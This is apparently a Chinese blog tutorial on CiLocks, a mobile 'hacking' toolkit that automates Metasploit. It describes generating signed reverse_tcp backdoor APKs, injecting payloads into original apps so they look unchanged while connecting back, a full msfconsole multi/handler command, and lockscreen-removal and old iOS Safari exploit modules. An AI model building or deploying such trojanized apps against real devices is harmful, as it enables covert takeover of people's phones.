news 2026/9/28 20:47:49

CiLocks Metasploit入门:4种Listener模式与msfconsole快速上手

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
CiLocks Metasploit入门:4种Listener模式与msfconsole快速上手

CiLocks Metasploit入门:4种Listener模式与msfconsole快速上手

【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks

CiLocks 是一款面向 Android/iOS 的终端安全测试工具箱,其中与Metasploit深度集成的模块是它的核心亮点:通过msfconsole一键拉起 exploit 与 post 模块,配合msfvenom生成reverse_tcp 后门 APK,并内置4 种 Listener 模式,让新手无需手写复杂命令即可快速上手移动端渗透实验。

⚠️ 声明:本项目仅可用于合法授权的安全测试与学习研究,请勿用于任何非法用途。

一键安装CiLocks:3步完成环境部署

CiLocks 运行在 Linux 终端环境(Kali、NetHunter、Termux 均可),依赖 ADB、PHP、Node 等工具。

第一步:安装基础依赖

sudo apt update -y sudo apt install php nodejs npm adb scrcpy wget unzip apktool jq -y

第二步:安装 Metasploit(msfconsole)

sudo apt install msfconsole -y

第三步:克隆仓库并启动

git clone https://gitcode.com/GitHub_Trending/ci/CiLocks cd CiLocks chmod +x cilocks sudo bash cilocks

启动后脚本会自动检测系统信息与已安装组件。贴心的是,data/config 会专门检查msfconsole是否存在,若未安装会弹窗提示sudo apt-get install msfconsole -y,避免新手在 Metasploit 菜单处卡住。

Metasploit子菜单:4大功能一览

在主菜单输入10进入Jump To Metasploit后,会出现「Metasploit Backdoor Generator」子菜单,入口逻辑位于主脚本 cilocks:

  1. Install Application— 通过 ADB 安装 APK 到目标设备
  2. Create Payload Backdoor {Msfvenom} Singed— 生成并签名后门 APK
  3. Run Metasploit— 启动 msfconsole 并选择 4 种 Listener 模式
  4. Inject Payload In Original Application— 将 payload 注入到原始应用中

功能1:Install Application 安装应用

输入 APK 路径并可选择是否立即运行。脚本执行adb install完成安装,若选择运行还会询问包名并自动启动对应 Activity,是测试阶段把"目标应用"部署到模拟器的最快方式。

功能2:Msfvenom 生成签名的Payload后门

这是整个工作流的起点。脚本会依次执行:

  • 用msfvenom -p android/meterpreter/reverse_tcp lhost=<你的IP> lport=<端口>生成反向连接 payload
  • 用keytool创建 Keystore、jarsigner签名(Android 要求 APK 必须签名才能安装)
  • 用zipalign对齐优化,最终产物保存在 backdoor/ 目录

你只需填入LHOST(攻击机 IP)与LPORT(监听端口),其余全自动。生成的 APK 在目标上打开后,会主动向你的 msfconsole 发起回连。

功能3:Run Metasploit —— 4种Listener模式详解

进入选项 3 后,CiLocks 展示了平台 payload 并给出4 种 Listener 模式(源码见 cilocks):

模式对应 Metasploit 模块适用场景
1. Multi Handler {默认}exploit/multi/handler通用接收器,等待任何 payload 回连,最常用
2. Remove Lockpost/android/manage/remove_lock获取会话后自动移除 Android 锁屏
3. Remove Lock {Root}post/android/manage/remove_lock_root针对已 Root 设备的锁屏移除
4. Safari Jit {iOS < 7.1.2}exploit/apple_ios/browser/safari_jit攻击老版本 iOS 的 Safari 漏洞

对应关系一目了然:

  • Android 目标→android/meterpreter/reverse_tcp
  • iOS 目标→osx/armle/execute/reverse_tcp

选择模式并填入 LHOST/LPORT 后,脚本会在新 xterm 窗口中执行类似下面的自动化命令:

msfconsole -x 'use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit; exit -y'

也就是说,CiLocks 把"打开 msfconsole → 选择模块 → 配置参数 → 启动监听"这一整套流程压缩成了菜单操作,这正是新手快速上手 Metasploit 的捷径。

功能4:Inject Payload 注入原始应用

与功能 2 生成空白后门不同,功能 4 使用msfvenom --platform android -x <原始APK> ...的方式,把 reverse_tcp payload注入到你提供的原始 APK中,产物同样输出到 backdoor/ 目录。注入后的应用界面不变,打开时却在后台回连——这是移动端渗透中最经典的投递手法,也是理解"为什么后门要签名"的关键环节。

常见问题:msfconsole与Listener排错清单

Q1:选完 Listener 没反应或提示找不到模块?先确认msfconsole -v可用;模块报缺失时执行msfupdate更新模块库。

Q2:目标 APK 打开了但一直没回连?检查三点:LHOST 是否为攻击机同一局域网的 IP、LPORT 是否被占用、目标设备与攻击机防火墙是否放行。

Q3:Remove Lock 系列模式与 Multi Handler 是互斥的吗?不是。Multi Handler 是"收连接"的监听器;Remove Lock 是拿到 meterpreter 会话后执行的 post 模块。实际使用通常先起 Multi Handler 拿会话,再在 msfconsole 里跑 remove_lock。

Q4:模拟器里 Brute 功能不生效?README 提示:若每 5 次错误后自动延迟 30 秒,可在脚本中调整adb shell input keyevent 26相关逻辑,具体见 README.md。

结语

CiLocks 的 Metasploit 模块把移动端渗透的完整链条——msfvenom 生成后门 → 签名注入 → msfconsole 四种 Listener 监听 → 锁屏移除——封装进了一个菜单,对刚接触msfconsole的新手极为友好。建议先在 Android 模拟器(NetHunter/Termux 已 Root)上跑通 Multi Handler 默认模式,再逐步尝试其余 Listener,理解每个模块背后的原理后,你也就真正入门了 Metasploit。

【免费下载链接】CiLocksCrack Interface lockscreen, Metasploit and More Android/IOS Hacking项目地址: https://gitcode.com/GitHub_Trending/ci/CiLocks

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/9/28 20:45:56

手电筒内部的充电回路

手电筒充电电路01 【手电筒充电电路】 一、拆卸手电筒 这是一个要废弃掉的可充电手电筒。 准备将它抛弃。 那下面有一个问题&#xff0c;它里边究竟是如何来充电的&#xff1f; 使用什么样的充电池&#xff1f; 为什么它现在损坏了&#xff1f; 下面我们打开它来一探究竟。 不…

作者头像 李华
网站建设 2026/9/28 20:45:43

宁波农业APP开发公司如何筛选?项目方案需要回答哪些业务问题

摘要&#xff1a;筛选宁波农业APP开发公司&#xff0c;应看其能否把生产记录与采购、采收、销售对应起来&#xff0c;并说明田间使用条件。请候选方拿一块地、一个作物周期和一次异常天气演示任务与数据&#xff0c;而不是只比较“智慧农业”功能清单。对正在评估地块、农事记录…

作者头像 李华
网站建设 2026/9/28 20:45:41

【软考高级架构师】什么是“伪分布式”?别以为用了 SpringCloud 就是架构师了

各位读者朋友,大家好。 面试的时候,我经常问候选人:“你们项目是分布式架构吗?” 十个人里有九个会自信满满地回答:“是啊,我们用了 Spring Cloud,全家桶都上了,Nacos、Feign、Sentinel 一个都没少。” 再往下问:“那分布式事务怎么处理的?服务雪崩怎么预防的?网络…

作者头像 李华
网站建设 2026/9/28 20:43:52

如何为Spirula Studio的网格烘焙纹理图集:UV展开与可见性裁剪

如何为Spirula Studio的网格烘焙纹理图集&#xff1a;UV展开与可见性裁剪 【免费下载链接】spirula-studio Cross-vendor 3D Gaussian Splatting trainer - video to splat to mesh, Vulkan or CUDA. 项目地址: https://gitcode.com/GitHub_Trending/sp/spirula-studio …

作者头像 李华
网站建设 2026/9/28 20:42:47

Xberg C 绑定实战:从 gzip 编码的远程文档中提取文本

后端AI 应用NLP 【免费下载链接】xberg Polyglot document intelligence with a Rust core: extract text, metadata, images, tables, and structured data from 106 formats across 140 file extensions, plus code intelligence for 371 languages. Fifteen bindings, with …

作者头像 李华